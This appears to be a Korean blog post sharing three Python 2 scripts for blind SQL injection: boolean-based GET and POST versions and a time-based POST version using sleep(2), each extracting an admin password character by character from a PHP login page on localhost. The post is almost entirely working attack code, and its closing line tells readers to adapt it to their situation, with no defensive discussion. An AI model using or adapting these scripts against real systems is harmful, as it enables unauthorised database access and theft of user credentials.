본문으로 바로가기

Python Blind,Time Based SQL Injection Source

category Coding/Python 2014. 6. 15. 04:36
반응형

GET.py


POST TIME.py


POST.py


 

[GET]


import httplib

import urllib

result=''

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=nb978enqqm4teudnsp27vi9i25','Content-Type':'application/x-www-form-urlencoded'}

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('GET','/pytest/get_ok.php?id=admin\'%20and%20ascii(substr(pw,'+str(i)+',1))='+str(ord(string[j]))+'%23&password=a','',headers)

            data=conn.getresponse().read()

            if 'Hello' in data:

                result=result+string[j]

                print str(i)+' Password is '+str(j)

                print result

                length=length+1

                break

            print str(i)+' -> '+string[j]

print 'Password is '+result




 

[POST]


import httplib

import urllib

result=""

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=j57q0n53cl5qhi1dhg527pq7o5','Content-Type':'application/x-www-form-urlencoded'}

            params=urllib.urlencode({"id":"admin' and ascii(substr(pw,"+str(i)+",1))="+str(ord(string[j]))+"#","pw":"1"})

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('POST','/pytest/login_ok.php',params,headers)

            data=conn.getresponse().read()

            if 'Hello' in data:

                result=result+string[j]

                print str(i)+' Password is '+str(j)

                print result

                length=length+1

                break

            print str(i)+' -> '+string[j]

print 'Password is '+result


 

 

[POST - Time Based]

 

import httplib

import urllib

import time

result=""

length=1

string="abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&*()_-=+"

for i in range(1,100):

    if(length<i):

        break

    else:

        for j in range(0,76):

            headers={'Cookie':'PHPSESSID=ac7f41c5fc30d8c8d1f4dbc0fbbc0f04','Content-Type':'application/x-www-form-urlencoded'}

            params=urllib.urlencode({"id":"admin' and if(ascii(substr(pw,"+str(i)+",1))="+str(ord(string[j]))+",sleep(2),0)#","password":"1"})

            t1=time.time()

            conn=httplib.HTTPConnection('127.0.0.1')

            conn.request('POST','/pytest/login_ok.php',params,headers)

            data=conn.getresponse().read()

            t2=time.time()

            print str(i)+' -> '+string[j]

            if(t2-t1)>=2:

                    result=result+string[j]

                    print str(i)+' Password is '+string[j]

                    print result

                    length=length+1

                    break

            else:

                    continue

        print 'Password is '+result


 

상황에 맞게 수정하여 쓰면 된다.

반응형

'Coding > Python' 카테고리의 다른 글

소켓 통신할때 Response 못받아오는 문제  (0) 2016.01.08
Selenium 경로설정  (0) 2016.01.08
DB Parser  (0) 2015.12.25
정렬 알고리즘  (0) 2015.03.09
파이썬 소켓 프로그래밍  (0) 2014.08.13

댓글을 달아 주세요